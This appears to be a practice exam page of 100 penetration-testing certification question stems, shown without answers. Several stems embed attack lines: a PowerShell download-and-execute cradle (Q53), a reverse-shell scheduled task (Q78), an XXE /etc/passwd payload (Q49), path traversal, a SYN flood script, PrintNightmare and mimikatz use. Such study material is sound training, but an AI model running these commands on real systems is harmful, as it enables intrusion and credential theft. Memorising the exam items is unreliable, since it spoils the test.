MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?
Question2: A client warns the assessment team that an ICS application is maintained by the manufacturer. Any tampering of the host could void the enterprise support terms of use.Which of the following techniques would be most effective to validate whether the application encrypts communications in transit?
Question3: During an assessment, a penetration tester manages to get RDP access via a low-privilege user. The tester attempts to escalate privileges by running the following commands:Import-Module .\PrintNightmare.ps1Invoke-Nightmare -NewUser "hacker" -NewPassword "Password123!" -DriverName "Print" The tester attempts to further enumerate the host with the new administrative privileges by using the runas command. However, the access level is still low. Which of the following actions should the penetration tester take next?
Question4: As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?
Question5: During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client's internal network. The tester later discusses the results with the client, but the client does not accept the results. The client indicates the host and assets that were within scope are not included in the vulnerability scan results. Which of the following should the tester have done?
Question6: A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?
Question7: A penetration tester conducts reconnaissance for a client's network and identifies the following system of interest:$ nmap -A AppServer1.compita.orgStarting Nmap 7.80 (2023-01-14) on localhost (127.0.0.1) at 2023-08-04 15:32:27 Nmap scan report for AppServer1.compita.org (192.168.1.100) Host is up (0.001s latency).Not shown: 999 closed portsPort State Service21/tcp open ftp22/tcp open ssh23/tcp open telnet80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds873/tcp open rsync8080/tcp open http-proxy8443/tcp open https-alt9090/tcp open zeus-admin10000/tcp open snet-sensor-mgmtThe tester notices numerous open ports on the system of interest. Which of the following best describes this system?
Question8: Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?
Question9: Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?
Question10: A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?
Question11: A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?
Question12: A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?
Question13: During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?
Question14: A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?
Question15: A penetration tester has been asked to conduct a blind web application test against a customer's corporate website. Which of the following tools would be best suited to perform this assessment?
Question16: During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?
Question17: During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result.Which of the following is the best tool to use for this task?
Question18: A penetration tester completes a scan and sees the following output on a host:bashCopy codeNmap scan report for victim (10.10.10.10)Host is up (0.0001s latency)PORT STATE SERVICE161/udp open|filtered snmp445/tcp open microsoft-ds3389/tcp open microsoft-dsRunning Microsoft Windows 7OS CPE: cpe:/o:microsoft:windows_7_sp0The tester wants to obtain shell access. Which of the following related exploits should the tester try first?
Question19: A penetration tester successfully gained access to manage resources and services within the company's cloud environment. This was achieved by exploiting poorly secured administrative credentials that had extensive permissions across the network. Which of the following credentials was the tester able to obtain?
Question20: During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?
Question21: A penetration tester is attempting to discover vulnerabilities in a company's web application. Which of the following tools would most likely assist with testing the security of the web application?
Question22: A tester is finishing an engagement and needs to ensure that artifacts resulting from the test are safely handled. Which of the following is the best procedure for maintaining client data privacy?
Question23: In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Through which of the following features could this information have been accessed?
Question24: A penetration tester needs to confirm the version number of a client's web application server. Which of the following techniques should the penetration tester use?
Question25: During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?
Question26: A penetration tester is unable to identify the Wi-Fi SSID on a client's cell phone.Which of the following techniques would be most effective to troubleshoot this issue?
Question27: A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?
Question28: A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?
Question29: With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan:Not shown: 1670 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.2.3 (CentOS)3306/tcp open mysql MySQL (unauthorized)8888/tcp open http lighttpd 1.4.32Which of the following tools should the tester use to quickly identify a potential attack path?
Question30: A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?
Question31: A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output:200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0No response; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: curl200; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0No response; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: python Which of the following actions should the tester take to get the scans to work properly?
Question32: A penetration tester attempts unauthorized entry to the company's server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?
Question33: A penetration tester finishes a security scan and uncovers numerous vulnerabilities on several hosts. Based on the targets' EPSS (Exploit Prediction Scoring System) and CVSS (Common Vulnerability Scoring System) scores, which of the following targets is the most likely to get attacked?
Question34: During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?
Question35: While performing a penetration testing exercise, a tester executes the following command:bashCopy codePS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe Which of the following best explains what the tester is trying to do?
Question36: During a pre-engagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?
Question37: Which of the following will reduce the possibility of introducing errors or bias in a penetration test report?
Question38: SIMULATIONUsing the output, identify potential attack vectors that should be further investigated.
Question39: During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops. Which of the following technical controls should the tester recommend to reduce the risk of compromise?
Question40: Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?
Question41: A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:Hostname | IP address | CVSS 2.0 | EPSShrdatabase | 192.168.20.55 | 9.9 | 0.50financesite | 192.168.15.99 | 8.0 | 0.01legaldatabase | 192.168.10.2 | 8.2 | 0.60fileserver | 192.168.125.7 | 7.6 | 0.90Which of the following targets should the tester select next?
Question42: A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following:SeAssignPrimaryTokenPrivilege DisabledSeIncreaseQuotaPrivilege DisabledSeChangeNotifyPrivilege EnabledSeManageVolumePrivilege EnabledSeImpersonatePrivilege EnabledSeCreateGlobalPrivilege EnabledSeIncreaseWorkingSetPrivilege DisabledWhich of the following privileges should the tester use to achieve the goal?
Question43: Which of the following OT protocols sends information in cleartext?
Question44: A penetration tester is working on a security assessment of a mobile application that was developed in-house for local use by a hospital. The hospital and its customers are very concerned about disclosure of information.Which of the following tasks should the penetration tester do first?
Question45: While performing an internal assessment, a tester uses the following command:crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@Which of the following is the main purpose of the command?
Question46: A penetration tester needs to identify all vulnerable input fields on a customer website. Which of the following tools would be best suited to complete this request?
Question47: Which of the following is the most efficient way to infiltrate a file containing data that could be sensitive?
Question48: During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?
Question49: A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:<?xml version="1.0"?><!DOCTYPE data [ <!ENTITY foo SYSTEM "file:///etc/passwd"> ]><test>&foo;</test>Which of the following should the tester recommend in the report to best prevent this type of vulnerability?
Question50: During an external penetration test, a tester receives the following output from a tool:test.comptia.orginfo.comptia.orgvpn.comptia.orgexam.comptia.orgWhich of the following commands did the tester most likely run to get these results?
Question51: A penetration tester is testing a power plant's network and needs to avoid disruption to the grid. Which of the following methods is most appropriate to identify vulnerabilities in the network?
Question52: A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?
Question53: Given the following script:$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1] If ($1 -eq "administrator") { echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -} Which of the following is the penetration tester most likely trying to do?
Question54: A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?
Question55: A penetration tester writes the following script to enumerate a 1724 network:1 #!/bin/bash2 for i in {1..254}; do3 ping -c1 192.168.1.$i4 doneThe tester executes the script, but it fails with the following error:-bash: syntax error near unexpected token `ping'Which of the following should the tester do to fix the error?
Question56: During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?
Question57: You are a penetration tester running port scans on a server.INSTRUCTIONSPart 1: Given the output, construct the command that was used to generate this output from the available options.Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question58: An external legal firm is conducting a penetration test of a large corporation. Which of the following would be most appropriate for the legal firm to use in the subject line of a weekly email update?
Question59: A company wants to perform a BAS (Breach and Attack Simu-lation) to measure the efficiency of the corporate security controls. Which of the following would most likely help the tester with simple command examples?
Question60: A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?Host | CVSS | EPSSTarget 1 | 4 | 0.6Target 2 | 2 | 0.3Target 3 | 1 | 0.6Target 4 | 4.5 | 0.4
Question61: A penetration tester is trying to get unauthorized access to a web application and executes the following command:GET /foo/images/file?id=2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd Which of the following web application attacks is the tester performing?
Question62: A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?
Question63: Which of the following elements of a penetration test report can be used to most effectively prioritize the remediation efforts for all the findings?
Question64: Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?
Question65: A penetration tester is preparing a password-spraying attack against a known list of users for the company"example". The tester is using the following list of commands:* pw-inspector -i sailwords -t 8 -S pass* spray365.py spray -ep plan* users="~/user.txt"; allwords="~/words.txt"; pass="~/passwords.txt"; plan="~/spray.plan"* spray365.py generate --password-file $pass --userfile $user --domain "example.com" --execution-plan$plan* cew -m 5 "http://www.example.com" -w sailwordsWhich of the following is the correct order for the list of the commands?
Question66: During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption. Which of the following attacks would accomplish this objective?
Question67: A penetration tester has found a web application that is running on a cloud virtual machine instance.Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter.Which of the following commands should the tester run to successfully test for secrets exposure exploitability?
Question68: As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?
Question69: A penetration tester identifies the URL for an internal administration application while following DevOps team members on their commutes. Which of the following attacks did the penetration tester most likely use?
Question70: During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?
Question71: A penetration tester compromises a Windows OS endpoint that is joined to an Active Directory local environment. Which of the following tools should the tester use to manipulate authentication mechanisms to move laterally in the network?
Question72: During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.INSTRUCTIONSAnalyze the code segments to determine which sections are needed to complete a port scanning script.Drag the appropriate elements into the correct locations to complete the script.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question73: A penetration tester is conducting an assessment of a web application's login page. The tester needs to determine whether there are any hidden form fields of interest. Which of the following is the most effective technique?
Question74: A penetration tester identifies the following open ports during a network enumeration scan:PORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind443/tcp open https27017/tcp open mongodb50123/tcp open ms-rpcWhich of the following commands did the tester use to get this output?
Question75: During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The tester receives the results and then executes the following command:snmpwalk -v 2c -c public 192.168.1.23Which of the following is the tester trying to do based on the command they used?
Question76: Which of the following post-exploitation activities allows a penetration tester to maintain persistent access in a compromised system?
Question77: A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:ip = IP("192.168.50.2")tcp = TCP(sport=RandShort(), dport=80, flags="S")raw = RAW(b"X"*1024)p = ip/tcp/rawsend(p, loop=1, verbose=0)Which of the following attack types is most likely being used in the test?
Question78: During an assessment, a penetration tester gains access to one of the internal hosts. Given the following command:schtasks /create /sc onlogon /tn "Windows Update" /tr "cmd.exe /c reverse_shell.exe" Which of the following is the penetration tester trying to do with this code?
Question79: A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client. The team crafts a Bash script for this task. However, they find a minor error in one line of the script:1 #!/bin/bash2 for i in $(cat example.txt); do3 curl $i4 doneWhich of the following changes should the team make to line 3 of the script?
Question80: During the reconnaissance phase, a penetration tester collected the following information from the DNS records:A-----> wwwA-----> hostTXT --> vpn.comptia.orgSPF---> ip =2.2.2.2Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?
Question81: A penetration tester completes a scan and sees the following Nmap output on a host:Nmap scan report for victim (10.10.10.10)Host is up (0.0001s latency)PORT STATE SERVICE161/udp open snmp445/tcp open microsoft-ds3389/tcp open ms-wbt-serverRunning Microsoft Windows 7OS CPE: cpe:/o:microsoft:windows_7::sp0The tester wants to obtain shell access. Which of the following related exploits should the tester try first?
Question82: Which of the following is within the scope of proper handling and is most crucial when working on a penetration testing report?
Question83: A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization. Which of the following should the penetration tester do to address this issue?
Question84: Which of the following methods should a physical penetration tester employ to access a rarely used door that has electronic locking mechanisms?
Question85: Which of the following is within the scope of proper handling and most crucial when working on a penetration testing report?
Question86: A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:for var in --MISSING TEXT-- doping -c 1 192.168.10.$vardoneWhich of the following pieces of code should the penetration tester use in place of -MISSING TEXT-?
Question87: A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?
Question88: A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:Action | SRC| DEST| --Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCPAllow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCPAllow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCPBlock | . | . | *Which of the following commands should the tester try next?
Question89: A penetration tester reviews a SAST vulnerability scan report. The following vulnerability has been reported as high severity:Source file: components.tsIssue 2 of 12: Command injectionSeverity: HighCall: .innerHTML = responseThe tester inspects the source file and finds the variable response is defined as a constant and is not referred to or used in other sections of the code. Which of the following describes how the tester should classify this reported vulnerability?
Question90: During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?
Question91: A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?
Question92: During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:findstr /SIM /C:"pass" *.txt *.cfg *.xmlWhich of the following is the penetration tester trying to enumerate?
Question93: A penetration tester successfully clones a source code repository and then runs the following command:find . -type f -exec egrep -i "token|key|login" {} \;Which of the following is the penetration tester conducting?
Question94: A tester gains initial access to a server and needs to enumerate all corporate domain DNS records.Which of the following commands should the tester use?
Question95: Given the following statements:* Implement a web application firewall.* Upgrade end-of-life operating systems.* Implement a secure software development life cycle.In which of the following sections of a penetration test report would the above statements be found?
Question96: A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?
Question97: Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?
Question98: During a penetration test, a tester compromises a Windows computer. The tester executes the following command and receives the following output:mimikatz # privilege::debugmimikatz # lsadump::cache---Output---lapsUser27dh9128361tsg2€459210138754ij---OutputEnd---Which of the following best describes what the tester plans to do by executing the command?
Question99: Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?
Question100: While conducting an assessment, a penetration tester identifies details for several unreleased products announced at a company-wide meeting.Which of the following attacks did the tester most likely use to discover this information?